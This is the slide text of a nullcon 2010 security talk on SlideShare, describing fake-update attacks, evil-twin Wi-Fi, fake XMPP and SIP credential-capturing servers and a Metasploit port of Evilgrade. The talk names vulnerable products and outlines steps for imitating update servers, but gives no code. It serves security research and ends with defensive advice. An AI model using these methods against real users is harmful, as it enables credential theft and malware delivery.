SlideShare ist ein Scribd-Unternehmen logo

nullcon 2010 - The evil karmetasploit upgrade

n|u - The Open Security Community
n|u - The Open Security Community

nullcon 2010 - The evil karmetasploit upgrade by Veysel Ozer

Technologie
1 von 43
Downloaden Sie, um offline zu lesen
Veysel Oezer The Evil Karmetasploit Upgrade nullcon Goa 2010 http://nullcon.net
Overview Introduction Background Title Realization Results Conclusion Demos in between ! nullcon Goa 2010 http://nullcon.net
Introduction IT Security Increasing attacks nullcon Goa 2010 http://nullcon.net
Introduction IT Security Increasing attacks also in Germany nullcon Goa 2010 http://nullcon.net
Introduction Know your enemy ! ”So it is said that if you know your enemies and know yourself, you will fight without danger in battles. If you only know yourself, but not your opponent, you may win or may lose. If you know neither yourself nor your enemy, you will always endanger yourself.” nullcon Goa 2010 http://nullcon.net
Background The man in the middle The hacker tools Evilgrade Metasploit Karma + Karmetasploit nullcon Goa 2010 http://nullcon.net
The man in the middle attack nullcon Goa 2010 http://nullcon.net
Known MitM attacks ARP spoofing DNS spoofing BGP hacking ICMP redirect, ... Karma ! The evil twin hotspot nullcon Goa 2010 http://nullcon.net
Background The hacker tools nullcon Goa 2010 http://nullcon.net
Evilgrade Framework for attacking weak update mechanisms ”The idea..is the centralization and exploitation of different update impl. all together in one tool” Written in Perl and published 2007-2008 Existing Module Sun Java nullcon Goa 2010 http://nullcon.net Apple OS X
Evilgrade How does it work nullcon Goa 2010 http://nullcon.net
Evilgrade nullcon Goa 2010 http://nullcon.net
Evilgrade nullcon Goa 2010 http://nullcon.net
Metasploit Vulnerability development framework Reduce the work for creating an exploit Penetration testing Several hundert exploits #5 from top 100 security tools Written in Ruby and BSD licensed "Don't try to teach yourself how to use metasploit under the security camera at the airport" nullcon Goa 2010 http://nullcon.net
Metasploit architecture nullcon Goa 2010 http://nullcon.net
Karma The evil twin access point MitM attack on WinXp Wireless Zero Configuration... Or just name ”FreeWifi” ;) After MitM, steal authentication data Http, Ftp, Pop3, Imap and so on Released in 2004 nullcon Goa 2010 http://nullcon.net
Karmetasploit Reimplemantion of Karma into Metasploit Fake access point integrated into aircrack-ng Authentication capturing implemented as auxiliary modules for Metasploit Several improvements Better hardware support Cookie,Form data stealing nullcon Goa 2010 http://nullcon.net Browser exploitation
Goals Evilgrade 2 Metasploit Reimplement functionality as metasploit module Improve new system • Port Sharing, Stealth mode, faster metasploit payload generation Transfer existing evilgrade modules into new system Create new fake servers Sip and XMPP Find new vulnerabilities in nullcon Goa 2010 http://nullcon.net software
Fake XMPP Based on TCP Used for Jabber → Instant Messaging Google Talk... Has built-in strong security, but depends on server and client Cleartext password transmission possible nullcon Goa 2010 http://nullcon.net
Fake Sip Server UDP based protocol Redefined in serveral RFCs Authentication similar to HTTP Digest Challenge – Response Try downgrade attack to use Basic Authentication nullcon Goa 2010 http://nullcon.net
Realisation Environments Evilgrade 2 Metasploit Authentication capturing servers Analysis of update mechanisms nullcon Goa 2010 http://nullcon.net
Used tools Wireshark Jacksum Vbindiff VmWare Workstation Netcat Ghex nullcon Goa 2010 http://nullcon.net
Attack Environment DEMO nullcon Goa 2010 http://nullcon.net
Realisation E-2-M nullcon Goa 2010 http://nullcon.net
Fake XMPP nullcon Goa 2010 http://nullcon.net
Fake Sip Server nullcon Goa 2010 http://nullcon.net
Analysis 1. Install an old version on the target. 2. Sniff the update process on the attacker. 3. Analyze network communication. 4. If possible, try to simulate the update server. 5. If possible, install latest version on the target. 6. Improve server to be version independent. 7. Improve server to allow to configure options, like the description shown as update information to the client. nullcon Goa 2010 http://nullcon.net
Results Fake SIP and XMPP servers Reimplementation of Evilgrade Analysis of update implemenations Not hacked Indirect hacks Hacked nullcon Goa 2010 http://nullcon.net
Results – fake server XMPP Works SIP Downgrade attack had no success Capturing of Digest Authentication is working DEMO nullcon Goa 2010 http://nullcon.net
Results Evilgrade in Metasploit Reimpl. the old functionality Old modules ported Several improvements • All mentioned ones • Anti-virus bypassing for metasploit payloads ( DEMO at the end if time left ) • Some others... nullcon Goa 2010 http://nullcon.net
Results - Analysis Not hacked uTorrent Avira Antivir Foxit Reader Vlc uses PGP Ad-Aware only one that uses SSL Spybot, AVG Antivir, Comodo Firewall, Picasa, ZoneAlarm, Winrar, flashget, camfrog.. nullcon Goa 2010 http://nullcon.net
Results – Not hacked Not hacked uTorrent uses binary signed data ?!? nullcon Goa 2010 http://nullcon.net
Results – Not hacked Not hacked Avira Antivir ­­­MASTER.IDX­­­ CRDATE=20090505_1833 <3f76d242c16a5491bfe98540f68c36c9> nullcon Goa 2010 http://nullcon.net
Results – Not hacked Foxit Reader and the fzip file format nullcon Goa 2010 http://nullcon.net
Results - Analysis Indirect hack Skype Quicktime Orbit Downloader Miranda IM DEMO nullcon Goa 2010 http://nullcon.net
Results Analysis Hacked Trillian Kerio Firewall SuperAntiSpyware Filezilla GomPlayer Divx Player nullcon Goa 2010 http://nullcon.net
Trillian update mechanism Binary update information Can you read that ? nullcon Goa 2010 http://nullcon.net
Trillian update mechanism Binary update information nullcon Goa 2010 http://nullcon.net
Results - Hacked DEMO nullcon Goa 2010 http://nullcon.net
Conclusion Release candidate of evil karmetasploit upgrade is ready No need for Evilgrade anymore Several improvements compared to Evilgrade New authentification capturing servers Several weak update implementations found, over 100 million downloads from www.cnet.com nullcon Goa 2010 http://nullcon.net
Conclusion Feature list for version 2 SIP downgrade attack on old SIP hardware Fake server XMPP over HTTP Improve design to handle Avira Antivir Feature list of version 3 Advanded stealth mode • Intelligent fake DNS server Find more vulnerabilites nullcon Goa 2010 http://nullcon.net
Conclusion Software developers Please make secure software Use standards and deny weak stuff by default And for the rest of us Be aware of this attack vectors Do not install every ”important security update” Do not trust security software by default Do not trust the Internet, nullcon Goa 2010 http://nullcon.net especially (public) Wifi networks
That's it ! Q & A nullcon Goa 2010 http://nullcon.net

Empfohlen

CSW2017 Qiang li zhibinhu_meiwang_dig into qemu security
CSW2017 Qiang li zhibinhu_meiwang_dig into qemu securityCSW2017 Qiang li zhibinhu_meiwang_dig into qemu security
CSW2017 Qiang li zhibinhu_meiwang_dig into qemu securityCanSecWest
 
Hacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote AccessHacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote AccessEC-Council
 
ShinoBOT Suite
ShinoBOT SuiteShinoBOT Suite
ShinoBOT SuiteShota Shinogi
 
TriplePlay-WebAppPenTestingTools
TriplePlay-WebAppPenTestingToolsTriplePlay-WebAppPenTestingTools
TriplePlay-WebAppPenTestingToolsYury Chemerkin
 
Hardening Three - IDS/IPS Technologies
Hardening Three - IDS/IPS TechnologiesHardening Three - IDS/IPS Technologies
Hardening Three - IDS/IPS TechnologiesSalvatore Lentini
 
Scalability, Fidelity and Stealth in the DRAKVUF Dynamic Malware Analysis System
Scalability, Fidelity and Stealth in the DRAKVUF Dynamic Malware Analysis SystemScalability, Fidelity and Stealth in the DRAKVUF Dynamic Malware Analysis System
Scalability, Fidelity and Stealth in the DRAKVUF Dynamic Malware Analysis SystemTamas K Lengyel
 
Andrea De Gaetano - An Adventure with ESP8266 firmwares and IOT
Andrea De Gaetano - An Adventure with ESP8266 firmwares and IOTAndrea De Gaetano - An Adventure with ESP8266 firmwares and IOT
Andrea De Gaetano - An Adventure with ESP8266 firmwares and IOTCodemotion
 
Mr201309 automated on-execute_test_using_virtual_box_eng
Mr201309 automated on-execute_test_using_virtual_box_engMr201309 automated on-execute_test_using_virtual_box_eng
Mr201309 automated on-execute_test_using_virtual_box_engFFRI, Inc.
 

Empfohlen

CSW2017 Qiang li zhibinhu_meiwang_dig into qemu security
CSW2017 Qiang li zhibinhu_meiwang_dig into qemu securityCSW2017 Qiang li zhibinhu_meiwang_dig into qemu security
CSW2017 Qiang li zhibinhu_meiwang_dig into qemu securityCanSecWest
 
Hacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote AccessHacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote AccessEC-Council
 
ShinoBOT Suite
ShinoBOT SuiteShinoBOT Suite
ShinoBOT SuiteShota Shinogi
 
TriplePlay-WebAppPenTestingTools
TriplePlay-WebAppPenTestingToolsTriplePlay-WebAppPenTestingTools
TriplePlay-WebAppPenTestingToolsYury Chemerkin
 
Hardening Three - IDS/IPS Technologies
Hardening Three - IDS/IPS TechnologiesHardening Three - IDS/IPS Technologies
Hardening Three - IDS/IPS TechnologiesSalvatore Lentini
 
Scalability, Fidelity and Stealth in the DRAKVUF Dynamic Malware Analysis System
Scalability, Fidelity and Stealth in the DRAKVUF Dynamic Malware Analysis SystemScalability, Fidelity and Stealth in the DRAKVUF Dynamic Malware Analysis System
Scalability, Fidelity and Stealth in the DRAKVUF Dynamic Malware Analysis SystemTamas K Lengyel
 
Andrea De Gaetano - An Adventure with ESP8266 firmwares and IOT
Andrea De Gaetano - An Adventure with ESP8266 firmwares and IOTAndrea De Gaetano - An Adventure with ESP8266 firmwares and IOT
Andrea De Gaetano - An Adventure with ESP8266 firmwares and IOTCodemotion
 
Mr201309 automated on-execute_test_using_virtual_box_eng
Mr201309 automated on-execute_test_using_virtual_box_engMr201309 automated on-execute_test_using_virtual_box_eng
Mr201309 automated on-execute_test_using_virtual_box_engFFRI, Inc.
 
CrySys guest-lecture: Virtual machine introspection on modern hardware
CrySys guest-lecture: Virtual machine introspection on modern hardwareCrySys guest-lecture: Virtual machine introspection on modern hardware
CrySys guest-lecture: Virtual machine introspection on modern hardwareTamas K Lengyel
 
Масштабируемый и эффективный фаззинг Google Chrome
Масштабируемый и эффективный фаззинг Google ChromeМасштабируемый и эффективный фаззинг Google Chrome
Масштабируемый и эффективный фаззинг Google ChromePositive Hack Days
 
Sandbox detection: leak, abuse, test - Hacktivity 2015
Sandbox detection: leak, abuse, test - Hacktivity 2015Sandbox detection: leak, abuse, test - Hacktivity 2015
Sandbox detection: leak, abuse, test - Hacktivity 2015Zoltan Balazs
 
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...Zoltan Balazs
 
Introduction of ShinoBOT (Black Hat USA 2013 Arsenal)
Introduction of ShinoBOT (Black Hat USA 2013 Arsenal)Introduction of ShinoBOT (Black Hat USA 2013 Arsenal)
Introduction of ShinoBOT (Black Hat USA 2013 Arsenal)Shota Shinogi
 
Pitfalls and limits of dynamic malware analysis
Pitfalls and limits of dynamic malware analysisPitfalls and limits of dynamic malware analysis
Pitfalls and limits of dynamic malware analysisTamas K Lengyel
 
Csw2017 bazhaniuk exploring_yoursystemdeeper_updated
Csw2017 bazhaniuk exploring_yoursystemdeeper_updatedCsw2017 bazhaniuk exploring_yoursystemdeeper_updated
Csw2017 bazhaniuk exploring_yoursystemdeeper_updatedCanSecWest
 
Wireless Hacking Fast Track
Wireless Hacking Fast TrackWireless Hacking Fast Track
Wireless Hacking Fast TrackNovizul Evendi
 
Defcon 22-jesus-molina-learn-how-to-control-every-room
Defcon 22-jesus-molina-learn-how-to-control-every-roomDefcon 22-jesus-molina-learn-how-to-control-every-room
Defcon 22-jesus-molina-learn-how-to-control-every-roomPriyanka Aash
 
Placing backdoors-through-firewalls
Placing backdoors-through-firewallsPlacing backdoors-through-firewalls
Placing backdoors-through-firewallsAkapo Damilola
 
Kernel Recipes 2019 - Hunting and fixing bugs all over the Linux kernel
Kernel Recipes 2019 - Hunting and fixing bugs all over the Linux kernelKernel Recipes 2019 - Hunting and fixing bugs all over the Linux kernel
Kernel Recipes 2019 - Hunting and fixing bugs all over the Linux kernelAnne Nicolas
 
IDS & Passive Network Defense
IDS & Passive Network DefenseIDS & Passive Network Defense
IDS & Passive Network DefenseSalvatore Lentini
 
Security & ethical hacking
Security & ethical hackingSecurity & ethical hacking
Security & ethical hackingAmanpreet Singh
 
Security & ethical hacking p2
Security & ethical hacking p2Security & ethical hacking p2
Security & ethical hacking p2ratnalajaggu
 
netfilter programming
netfilter programmingnetfilter programming
netfilter programmingGopi Krishnan S
 
Mirko Damiani - An Embedded soft real time distributed system in Go
Mirko Damiani - An Embedded soft real time distributed system in GoMirko Damiani - An Embedded soft real time distributed system in Go
Mirko Damiani - An Embedded soft real time distributed system in Golinuxlab_conf
 
Dynamic Port Scanning
Dynamic Port ScanningDynamic Port Scanning
Dynamic Port Scanningamiable_indian
 
Understanding Open vSwitch
Understanding Open vSwitch Understanding Open vSwitch
Understanding Open vSwitch YongKi Kim
 
Virtual Machine Introspection with Xen
Virtual Machine Introspection with XenVirtual Machine Introspection with Xen
Virtual Machine Introspection with XenTamas K Lengyel
 
Stupid iptables tricks
Stupid iptables tricksStupid iptables tricks
Stupid iptables tricksJim MacLeod
 
Evilgrade Defcon 18 2010
Evilgrade Defcon 18 2010Evilgrade Defcon 18 2010
Evilgrade Defcon 18 2010Francisco Müller Amato
 
Hash map导致cpu100% 的分析
Hash map导致cpu100% 的分析Hash map导致cpu100% 的分析
Hash map导致cpu100% 的分析wang hongjiang
 

Weitere ähnliche Inhalte

Was ist angesagt?

CrySys guest-lecture: Virtual machine introspection on modern hardware
CrySys guest-lecture: Virtual machine introspection on modern hardwareCrySys guest-lecture: Virtual machine introspection on modern hardware
CrySys guest-lecture: Virtual machine introspection on modern hardwareTamas K Lengyel
 
Масштабируемый и эффективный фаззинг Google Chrome
Масштабируемый и эффективный фаззинг Google ChromeМасштабируемый и эффективный фаззинг Google Chrome
Масштабируемый и эффективный фаззинг Google ChromePositive Hack Days
 
Sandbox detection: leak, abuse, test - Hacktivity 2015
Sandbox detection: leak, abuse, test - Hacktivity 2015Sandbox detection: leak, abuse, test - Hacktivity 2015
Sandbox detection: leak, abuse, test - Hacktivity 2015Zoltan Balazs
 
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...Zoltan Balazs
 
Introduction of ShinoBOT (Black Hat USA 2013 Arsenal)
Introduction of ShinoBOT (Black Hat USA 2013 Arsenal)Introduction of ShinoBOT (Black Hat USA 2013 Arsenal)
Introduction of ShinoBOT (Black Hat USA 2013 Arsenal)Shota Shinogi
 
Pitfalls and limits of dynamic malware analysis
Pitfalls and limits of dynamic malware analysisPitfalls and limits of dynamic malware analysis
Pitfalls and limits of dynamic malware analysisTamas K Lengyel
 
Csw2017 bazhaniuk exploring_yoursystemdeeper_updated
Csw2017 bazhaniuk exploring_yoursystemdeeper_updatedCsw2017 bazhaniuk exploring_yoursystemdeeper_updated
Csw2017 bazhaniuk exploring_yoursystemdeeper_updatedCanSecWest
 
Wireless Hacking Fast Track
Wireless Hacking Fast TrackWireless Hacking Fast Track
Wireless Hacking Fast TrackNovizul Evendi
 
Defcon 22-jesus-molina-learn-how-to-control-every-room
Defcon 22-jesus-molina-learn-how-to-control-every-roomDefcon 22-jesus-molina-learn-how-to-control-every-room
Defcon 22-jesus-molina-learn-how-to-control-every-roomPriyanka Aash
 
Placing backdoors-through-firewalls
Placing backdoors-through-firewallsPlacing backdoors-through-firewalls
Placing backdoors-through-firewallsAkapo Damilola
 
Kernel Recipes 2019 - Hunting and fixing bugs all over the Linux kernel
Kernel Recipes 2019 - Hunting and fixing bugs all over the Linux kernelKernel Recipes 2019 - Hunting and fixing bugs all over the Linux kernel
Kernel Recipes 2019 - Hunting and fixing bugs all over the Linux kernelAnne Nicolas
 
IDS & Passive Network Defense
IDS & Passive Network DefenseIDS & Passive Network Defense
IDS & Passive Network DefenseSalvatore Lentini
 
Security & ethical hacking
Security & ethical hackingSecurity & ethical hacking
Security & ethical hackingAmanpreet Singh
 
Security & ethical hacking p2
Security & ethical hacking p2Security & ethical hacking p2
Security & ethical hacking p2ratnalajaggu
 
Mirko Damiani - An Embedded soft real time distributed system in Go
Mirko Damiani - An Embedded soft real time distributed system in GoMirko Damiani - An Embedded soft real time distributed system in Go
Mirko Damiani - An Embedded soft real time distributed system in Golinuxlab_conf
 
Understanding Open vSwitch
Understanding Open vSwitch Understanding Open vSwitch
Understanding Open vSwitch YongKi Kim
 
Virtual Machine Introspection with Xen
Virtual Machine Introspection with XenVirtual Machine Introspection with Xen
Virtual Machine Introspection with XenTamas K Lengyel
 
Stupid iptables tricks
Stupid iptables tricksStupid iptables tricks
Stupid iptables tricksJim MacLeod
 

Was ist angesagt? (20)

CrySys guest-lecture: Virtual machine introspection on modern hardware
CrySys guest-lecture: Virtual machine introspection on modern hardwareCrySys guest-lecture: Virtual machine introspection on modern hardware
CrySys guest-lecture: Virtual machine introspection on modern hardware
 
Масштабируемый и эффективный фаззинг Google Chrome
Масштабируемый и эффективный фаззинг Google ChromeМасштабируемый и эффективный фаззинг Google Chrome
Масштабируемый и эффективный фаззинг Google Chrome
 
Sandbox detection: leak, abuse, test - Hacktivity 2015
Sandbox detection: leak, abuse, test - Hacktivity 2015Sandbox detection: leak, abuse, test - Hacktivity 2015
Sandbox detection: leak, abuse, test - Hacktivity 2015
 
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
 
Introduction of ShinoBOT (Black Hat USA 2013 Arsenal)
Introduction of ShinoBOT (Black Hat USA 2013 Arsenal)Introduction of ShinoBOT (Black Hat USA 2013 Arsenal)
Introduction of ShinoBOT (Black Hat USA 2013 Arsenal)
 
Pitfalls and limits of dynamic malware analysis
Pitfalls and limits of dynamic malware analysisPitfalls and limits of dynamic malware analysis
Pitfalls and limits of dynamic malware analysis
 
Csw2017 bazhaniuk exploring_yoursystemdeeper_updated
Csw2017 bazhaniuk exploring_yoursystemdeeper_updatedCsw2017 bazhaniuk exploring_yoursystemdeeper_updated
Csw2017 bazhaniuk exploring_yoursystemdeeper_updated
 
Wireless Hacking Fast Track
Wireless Hacking Fast TrackWireless Hacking Fast Track
Wireless Hacking Fast Track
 
Defcon 22-jesus-molina-learn-how-to-control-every-room
Defcon 22-jesus-molina-learn-how-to-control-every-roomDefcon 22-jesus-molina-learn-how-to-control-every-room
Defcon 22-jesus-molina-learn-how-to-control-every-room
 
Placing backdoors-through-firewalls
Placing backdoors-through-firewallsPlacing backdoors-through-firewalls
Placing backdoors-through-firewalls
 
Kernel Recipes 2019 - Hunting and fixing bugs all over the Linux kernel
Kernel Recipes 2019 - Hunting and fixing bugs all over the Linux kernelKernel Recipes 2019 - Hunting and fixing bugs all over the Linux kernel
Kernel Recipes 2019 - Hunting and fixing bugs all over the Linux kernel
 
IDS & Passive Network Defense
IDS & Passive Network DefenseIDS & Passive Network Defense
IDS & Passive Network Defense
 
Security & ethical hacking
Security & ethical hackingSecurity & ethical hacking
Security & ethical hacking
 
Security & ethical hacking p2
Security & ethical hacking p2Security & ethical hacking p2
Security & ethical hacking p2
 
netfilter programming
netfilter programmingnetfilter programming
netfilter programming
 
Mirko Damiani - An Embedded soft real time distributed system in Go
Mirko Damiani - An Embedded soft real time distributed system in GoMirko Damiani - An Embedded soft real time distributed system in Go
Mirko Damiani - An Embedded soft real time distributed system in Go
 
Dynamic Port Scanning
Dynamic Port ScanningDynamic Port Scanning
Dynamic Port Scanning
 
Understanding Open vSwitch
Understanding Open vSwitch Understanding Open vSwitch
Understanding Open vSwitch
 
Virtual Machine Introspection with Xen
Virtual Machine Introspection with XenVirtual Machine Introspection with Xen
Virtual Machine Introspection with Xen
 
Stupid iptables tricks
Stupid iptables tricksStupid iptables tricks
Stupid iptables tricks
 

Andere mochten auch

Hash map导致cpu100% 的分析
Hash map导致cpu100% 的分析Hash map导致cpu100% 的分析
Hash map导致cpu100% 的分析wang hongjiang
 
Effective linux.2.(tools)
Effective linux.2.(tools)Effective linux.2.(tools)
Effective linux.2.(tools)wang hongjiang
 
深入剖析Concurrent hashmap中的同步机制(上)
深入剖析Concurrent hashmap中的同步机制(上)深入剖析Concurrent hashmap中的同步机制(上)
深入剖析Concurrent hashmap中的同步机制(上)wang hongjiang
 
Effective linux.1.(commandline)
Effective linux.1.(commandline)Effective linux.1.(commandline)
Effective linux.1.(commandline)wang hongjiang
 
Metasploit
MetasploitMetasploit
Metasploitninguna
 
Critical path and pert
Critical path and pertCritical path and pert
Critical path and pertdjoufack
 
Aspects of nepal's rural infrastructure project managment by bhim upadhyaya
Aspects of nepal's rural infrastructure project managment by bhim upadhyayaAspects of nepal's rural infrastructure project managment by bhim upadhyaya
Aspects of nepal's rural infrastructure project managment by bhim upadhyayaBhim Upadhyaya
 
Introduction to Project Managment ***NEW TRAINING CLASS***
Introduction to Project Managment ***NEW TRAINING CLASS***Introduction to Project Managment ***NEW TRAINING CLASS***
Introduction to Project Managment ***NEW TRAINING CLASS***TJP Solutions
 
Finalppt metasploit
Finalppt metasploitFinalppt metasploit
Finalppt metasploitdevilback
 
Metasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner ClassMetasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner ClassGeorgia Weidman
 

Andere mochten auch (13)

Evilgrade Defcon 18 2010
Evilgrade Defcon 18 2010Evilgrade Defcon 18 2010
Evilgrade Defcon 18 2010
 
Hash map导致cpu100% 的分析
Hash map导致cpu100% 的分析Hash map导致cpu100% 的分析
Hash map导致cpu100% 的分析
 
Effective linux.2.(tools)
Effective linux.2.(tools)Effective linux.2.(tools)
Effective linux.2.(tools)
 
深入剖析Concurrent hashmap中的同步机制(上)
深入剖析Concurrent hashmap中的同步机制(上)深入剖析Concurrent hashmap中的同步机制(上)
深入剖析Concurrent hashmap中的同步机制(上)
 
Effective linux.1.(commandline)
Effective linux.1.(commandline)Effective linux.1.(commandline)
Effective linux.1.(commandline)
 
Metasploit Basics
Metasploit BasicsMetasploit Basics
Metasploit Basics
 
Metasploit
MetasploitMetasploit
Metasploit
 
Prince 2: project managment Document Risk log
Prince 2: project managment Document Risk logPrince 2: project managment Document Risk log
Prince 2: project managment Document Risk log
 
Critical path and pert
Critical path and pertCritical path and pert
Critical path and pert
 
Aspects of nepal's rural infrastructure project managment by bhim upadhyaya
Aspects of nepal's rural infrastructure project managment by bhim upadhyayaAspects of nepal's rural infrastructure project managment by bhim upadhyaya
Aspects of nepal's rural infrastructure project managment by bhim upadhyaya
 
Introduction to Project Managment ***NEW TRAINING CLASS***
Introduction to Project Managment ***NEW TRAINING CLASS***Introduction to Project Managment ***NEW TRAINING CLASS***
Introduction to Project Managment ***NEW TRAINING CLASS***
 
Finalppt metasploit
Finalppt metasploitFinalppt metasploit
Finalppt metasploit
 
Metasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner ClassMetasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner Class
 

Ähnlich wie nullcon 2010 - The evil karmetasploit upgrade

Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsHacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsShakacon
 
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliDefcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliPriyanka Aash
 
Install MariaDB on IBM i - Tips, troubleshooting, and more
Install MariaDB on IBM i - Tips, troubleshooting, and moreInstall MariaDB on IBM i - Tips, troubleshooting, and more
Install MariaDB on IBM i - Tips, troubleshooting, and moreRod Flohr
 
26.1.7 lab snort and firewall rules
26.1.7 lab snort and firewall rules26.1.7 lab snort and firewall rules
26.1.7 lab snort and firewall rulesFreddy Buenaño
 
Inside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Inside the Matrix,How to Build Transparent Sandbox for Malware AnalysisInside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Inside the Matrix,How to Build Transparent Sandbox for Malware AnalysisChong-Kuan Chen
 
Automated Penetration Testing With The Metasploit Framework
Automated Penetration Testing With The Metasploit FrameworkAutomated Penetration Testing With The Metasploit Framework
Automated Penetration Testing With The Metasploit FrameworkTom Eston
 
Fuzzing malware for fun & profit. Applying Coverage-Guided Fuzzing to Find Bu...
Fuzzing malware for fun & profit. Applying Coverage-Guided Fuzzing to Find Bu...Fuzzing malware for fun & profit. Applying Coverage-Guided Fuzzing to Find Bu...
Fuzzing malware for fun & profit. Applying Coverage-Guided Fuzzing to Find Bu...Maksim Shudrak
 
Hacktivity 2016: Stealthy, hypervisor based malware analysis
Hacktivity 2016: Stealthy, hypervisor based malware analysisHacktivity 2016: Stealthy, hypervisor based malware analysis
Hacktivity 2016: Stealthy, hypervisor based malware analysisTamas K Lengyel
 
Penetration Testing Project Game of Thrones CTF: 1
Penetration Testing Project Game of Thrones CTF: 1Penetration Testing Project Game of Thrones CTF: 1
Penetration Testing Project Game of Thrones CTF: 1Florin D. Tanasache
 
Lab-10 Malware Creation and Denial of Service (DoS) In t.docx
Lab-10 Malware Creation and Denial of Service (DoS) In t.docxLab-10 Malware Creation and Denial of Service (DoS) In t.docx
Lab-10 Malware Creation and Denial of Service (DoS) In t.docxpauline234567
 
Deep Exploit@Black Hat Europe 2018 Arsenal
Deep Exploit@Black Hat Europe 2018 ArsenalDeep Exploit@Black Hat Europe 2018 Arsenal
Deep Exploit@Black Hat Europe 2018 ArsenalIsao Takaesu
 
Parrot Drones Hijacking
Parrot Drones HijackingParrot Drones Hijacking
Parrot Drones HijackingPriyanka Aash
 
Laporan Praktikum Keamanan Siber - Tugas 1 - Kelas C - Kelompok 3.pdf
Laporan Praktikum Keamanan Siber - Tugas 1 - Kelas C - Kelompok 3.pdfLaporan Praktikum Keamanan Siber - Tugas 1 - Kelas C - Kelompok 3.pdf
Laporan Praktikum Keamanan Siber - Tugas 1 - Kelas C - Kelompok 3.pdfIGedeArieYogantaraSu
 
Import golang; struct microservice
Import golang; struct microserviceImport golang; struct microservice
Import golang; struct microserviceGiulio De Donato
 
Rock-solid Magento Deployments (and Development)
Rock-solid Magento Deployments (and Development)Rock-solid Magento Deployments (and Development)
Rock-solid Magento Deployments (and Development)AOE
 

Ähnlich wie nullcon 2010 - The evil karmetasploit upgrade (20)

Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsHacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
 
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliDefcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
 
Install MariaDB on IBM i - Tips, troubleshooting, and more
Install MariaDB on IBM i - Tips, troubleshooting, and moreInstall MariaDB on IBM i - Tips, troubleshooting, and more
Install MariaDB on IBM i - Tips, troubleshooting, and more
 
26.1.7 lab snort and firewall rules
26.1.7 lab snort and firewall rules26.1.7 lab snort and firewall rules
26.1.7 lab snort and firewall rules
 
Inside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Inside the Matrix,How to Build Transparent Sandbox for Malware AnalysisInside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Inside the Matrix,How to Build Transparent Sandbox for Malware Analysis
 
The FatRat
The FatRatThe FatRat
The FatRat
 
Automated Penetration Testing With The Metasploit Framework
Automated Penetration Testing With The Metasploit FrameworkAutomated Penetration Testing With The Metasploit Framework
Automated Penetration Testing With The Metasploit Framework
 
nullcon 2010 - Software Fuzzing with Wireplay
nullcon 2010 - Software Fuzzing with Wireplaynullcon 2010 - Software Fuzzing with Wireplay
nullcon 2010 - Software Fuzzing with Wireplay
 
Fuzzing malware for fun & profit. Applying Coverage-Guided Fuzzing to Find Bu...
Fuzzing malware for fun & profit. Applying Coverage-Guided Fuzzing to Find Bu...Fuzzing malware for fun & profit. Applying Coverage-Guided Fuzzing to Find Bu...
Fuzzing malware for fun & profit. Applying Coverage-Guided Fuzzing to Find Bu...
 
Hacktivity 2016: Stealthy, hypervisor based malware analysis
Hacktivity 2016: Stealthy, hypervisor based malware analysisHacktivity 2016: Stealthy, hypervisor based malware analysis
Hacktivity 2016: Stealthy, hypervisor based malware analysis
 
Penetration Testing Project Game of Thrones CTF: 1
Penetration Testing Project Game of Thrones CTF: 1Penetration Testing Project Game of Thrones CTF: 1
Penetration Testing Project Game of Thrones CTF: 1
 
Lab-10 Malware Creation and Denial of Service (DoS) In t.docx
Lab-10 Malware Creation and Denial of Service (DoS) In t.docxLab-10 Malware Creation and Denial of Service (DoS) In t.docx
Lab-10 Malware Creation and Denial of Service (DoS) In t.docx
 
Deep Exploit@Black Hat Europe 2018 Arsenal
Deep Exploit@Black Hat Europe 2018 ArsenalDeep Exploit@Black Hat Europe 2018 Arsenal
Deep Exploit@Black Hat Europe 2018 Arsenal
 
Mcollective introduction
Mcollective introductionMcollective introduction
Mcollective introduction
 
Parrot Drones Hijacking
Parrot Drones HijackingParrot Drones Hijacking
Parrot Drones Hijacking
 
Laporan Praktikum Keamanan Siber - Tugas 1 - Kelas C - Kelompok 3.pdf
Laporan Praktikum Keamanan Siber - Tugas 1 - Kelas C - Kelompok 3.pdfLaporan Praktikum Keamanan Siber - Tugas 1 - Kelas C - Kelompok 3.pdf
